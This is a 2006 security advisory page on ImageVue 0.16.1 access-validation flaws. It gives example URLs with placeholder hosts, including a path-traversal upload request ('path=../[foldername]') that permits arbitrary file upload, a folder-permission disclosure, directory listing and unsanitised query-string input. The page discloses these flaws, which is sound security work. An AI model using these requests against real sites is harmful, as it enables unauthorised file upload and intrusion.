exploits , vulnerabilities , articles , ImageVue Multiple Vulnerabilities

Title	ImageVue Multiple Vulnerabilities
Published	2006-02-11-12:00AM
Updated	2006-02-11-12:00AM
Class	Access Validation Error
CVE
Remote	Yes
Local	No
Credit	Discovery is credited to zjieb@hotmail.com.
Vulnerable	ImageVue ImageVue 0.16.1
Not Vulnerable
Code	The following examples were provided: 1) check folder permissions: http://www.example.com/dir.php An XML-document is shown containing all folders and their permissions. 2) upload a file to a folder from the XML http://www.example.com/admin/upload.php?path=../[foldername] Now you're ready to upload any file. Other vulnerabilities: 1) view dir listings http://www.example.com/readfolder.php?path=[path]&ext=[extension] 2) querystring is passed to style and body http://www.example.com/index.php?bgcol=[input]
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-17 HP OpenView Storage Data Protector Multiple Remote Code Execution Vulnerabilities
• 2009-12-17 iDevSpot iSupport Multiple Cross Site Scripting Vulnerabilities
• 2009-12-17 GNU Automake Insecure Directory Permissions Vulnerability
• 2009-12-17 Mozilla Firefox CVE-2009-3979 Multiple Remote Memory Corruption Vulnerabilities
• 2009-12-17 Mozilla Firefox CVE-2009-3981 Remote Memory Corruption Vulnerability
• 2009-12-17 Drupal Sections Module HTML Injection Vulnerability
• 2009-12-17 Mozilla Firefox and SeaMonkey Theora Video Library Remote Integer Overflow Vulnerability
• 2009-12-17 Mozilla Firefox and Sea Monkey Insecure Protocol Location Bar Spoofing Vulnerability
• 2009-12-17 Mozilla Firefox and Sea Monkey Content Injection Spoofing Vulnerability
• 2009-12-17 Mozilla Firefox/SeaMonkey GeckoActiveXObject Exception Message COM Object Enumeration Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 20:52:14 +0000